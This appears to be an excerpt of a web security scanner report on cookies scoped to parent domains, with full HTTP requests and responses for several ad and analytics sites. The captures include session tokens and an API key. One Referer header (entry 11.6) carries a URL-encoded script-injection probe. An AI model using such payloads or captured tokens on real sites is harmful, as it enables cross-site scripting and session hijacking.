A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. http://a.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://a.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fpc.pl?a=10001494318262&v=5.17&enc=UTF-8&b=Downloads%20%7C%20Yahoo!%20Advertising%20Blog&f=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2Fdownloads%2F&e=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2F2011%2F05%2F31%2Fyahoo-launches-clear-ad-notice%2F&flv=Shockwave%20Flash%2010.3%20r181&d=Tue%2C%2014%20Jun%202011%2000%3A26%3A38%20GMT&n=5&g=en-US&h=Y&j=1920x1200&k=32&l=true&ittidx=0&fpc=v-Z-Or9d%7CqwoUoZiLaa%7Cfses10001494318262%3D%7CqwoUoZiLaa%7Cv-Z-Or9d%7Cfvis10001494318262%3DZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw%3D%3D%7C8MYoY8Yos7%7C8MYoY8Yos7%7C8MYoY8Yos7%7C8%7C8MYoY8Yos7%7C8MYoY8Yos7 HTTP/1.1
Host: a.analytics.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/downloads/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=; itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|M|M|M|s|8MYoY8YoMM|M; itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:27:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|7|7|7|8|8MYoY88s11|7; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=; path=/; domain=.analytics.yahoo.com
TS: 0 261 dc3_ac4
Pragma: no-cache
Expires: Tue, 14 Jun 2011 00:27:36 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Connection: close
Content-Type: application/x-javascript

// First Party Cookies
// TS: 0 261 dc3_ac4


11.2. http://a.analytics.yahoo.com/p.pl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://a.analytics.yahoo.com
Path:   /p.pl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p.pl?a=1000380893662&v=5.17&enc=UTF-8&b=Home%20page&c=yahoo!%20advertising%20solutions&f=http%3A%2F%2Fadvertising.yahoo.com%2F&x=7&cf20=EXIT&cf21=click%20Sponsored%20Search&ca=1&ix=2&ittidx=0&fpc= HTTP/1.1
Host: a.analytics.yahoo.com
Proxy-Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|8MYoY8YosM|8MYoY8YosM|8MYoY8YosM|8|8MYoY8YosM|8MYoY8YosM; itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|M|M|M|s|8MYoY8YoMM|M; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; path=/; domain=.analytics.yahoo.com
TS: 0 272 dc12_ac4
Connection: close
Pragma: no-cache
Expires: Tue, 14 Jun 2011 00:20:34 GMT
Cache-Control: no-cache, private, must-revalidate
Accept-Ranges: bytes
Tracking-Status: site tracked
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.3. http://gs.mtv.com/games/playgame.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://gs.mtv.com
Path:   /games/playgame.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /games/playgame.php?site_id=1&game_id=1390 HTTP/1.1
Host: gs.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=0

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Content-Length: 1190
Date: Tue, 14 Jun 2011 00:19:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; path=/; domain=mtv.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

11.4. http://www.forexfactory.com/excal.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /excal.php?do=fetchcss&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=407.52568085398525 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:01:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: ffsessionhash=f4bf7286639f1eb8531a1e8b00c74e68; path=/; domain=.forexfactory.com; HttpOnly
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:01:48 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:01:48 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2361
Content-Type: text/css

#_s_ff_syn {
background: transparent;
margin: 0;
padding: 0;
height: 100%;
}

#wscal_parent * { margin: 0 padding: 0;}

.bigusername { font-size: 14pt; }

.wscal_vbmenu_popup
{
   backgroun
...[SNIP]...

11.5. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=alexacom&adSpace=us&tagKey=2057624979&th=24047165603&tKey=undefined&size=160x600&flashVer=10&ver=1.20&center=1&noAd=1&url=http%3A%2F%2Fwww.alexa.com%2F&f=1&p=11240442&a=1&rnd=11248586 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1219;c=15/1;w=160;h=600;d=7;s=1;q=ALEXA_core
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=atnfruriItm63PT3eCiVPFU9J3JngpSjAbVAFjAQ74dPYSjsRwrHYvtnr4KeUB2FN0mFZam1Q4Zb5rCJ9tK3lqAbkvlpOS1Rdt7DmDyL6OUtkALmYL4Wavq3MgWc1HeOgorXrJaK5sPy8H3fG6rR2QZb73RfYD7XNfUw2v862OqaRixZb5S92TBo0ZboG8xCyE6ccrY1vMr0lZcJ7HEQqUTs7ZcGWgDTZaBv8fwLdEfO2cZa8blJZaeDCHYK1lVZc5p4aZdjZbgKkBDVSbYfiUeYvpSwrMTOZbs9Wowek8qxQSRDXPB1fo6POyHSk8EZcVlcW544LyeJJRyc7ZcwlPqgZcKVBvq5DYG37tj6JHGQIxn0qQfwbekxTZdBnNq3VQPGVtTDRPQbxuhmTir4T31S7RWZbZdB6DKqCZdjLm33R3r6FushuEK4WJu9ZdYGR2HKcGU8us7udWbaEpQSIXx2NZa

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aungjUwl6hwUQQwgQRaCFyUS7jC64OywUPxH2ILm35hSvP9FsxMpesmpvZcKIfCWWhrWEmo3P82WbGmlrZcx7bYZcZagpWnmhairy6ma7rJZb2NA6HsUJcwdNZbaPZbs2Nb2PgQrirwuO5T3mBsjwZc6n329ruwdYsDmIQ7to3tB6ZbwdyuKZdUaV6IeZa6gVVsdAjgeoEB700gMh3ZdOtZd67b0AmhcNCddDXtZaYcwYZd1e7Zb2dZdRfvDfUlFtQ823R25PKTHZabPZax2JX8F6clMqSZaORTCEDtY90WCRXbpAtNEHsrWXN8S2QpOdP6Q6Zd41WXX2R1yIrKYkpZcfxSRoho14QMZbSB36SmkGC0185hLHQsZaKwCrPRcGI54u10SehUmjwOtm54055TZdrgTkHc7m0BimPPCqGAjO55gdM06TeYZbsbZap6n1ZcNJAwGBYIhgR8oWONy4mlQZbZdoO3NBHYYQHoFrMrMTb6CZcw; path=/; domain=.tribalfusion.com; expires=Mon, 12-Sep-2011 00:28:25 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 386
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/armMfj4sQUYbQKTmPm4mZb7RP7J3dnnXWrZamdIv36YT3GMdTsJ9WVJ7P6FvWdY3WFj43ritVqUtTTQ8SaQISGQIRr6vRW7aVGfQ2FPomHqs0amM4dMBPsb
...[SNIP]...

11.6. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;241002212;63651464;o?http://us.havaianas.com/MYOH.html HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: id=c60bd0733000097|3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://us.havaianas.com/MYOH.html
Set-Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; path=/; domain=.doubleclick.net; expires=Fri, 08 Feb 2013 14:08:21 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 13 Jun 2011 17:45:35 GMT
Server: GFE/2.0
Content-Type: text/html


11.7. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1188614T19920110117205515&cid=1478425&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b26/3/0/*/v%3B242169367%3B0-0%3B3%3B39555935%3B3454-728/90%3B40388893/40406680/1%3Bu=!category-games|pos-atf|tag-adj|mtype-standard|sz-728x90|tile-2|demo-D|demo-T|demo-5840|demo-2966|demo-2907|demo-2905|demo-2904|demo-1607|demo-1299|demo-850|demo-848|demo-844|demo-827|demo-790|demo-777|demo-775|demo-774%3B~aopt=2/1/c6a3/0%3B~sscs=%3F$CTURL$&time=1|19:19|-5&r=0.015173257561400533&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=96A50400-1413-8C47-0309-C2F0023E0100; PRca=|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:19:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 7965
Set-Cookie:PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A0A50400-79FC-2CEB-0209-123004DD0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJfR*19:2|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJfRAAAT:2|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzNM:2|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMb9:2|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzNMGMb9:2|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

11.8. http://api.bizographics.com/v1/profile.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 14 Jun 2011 00:13:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
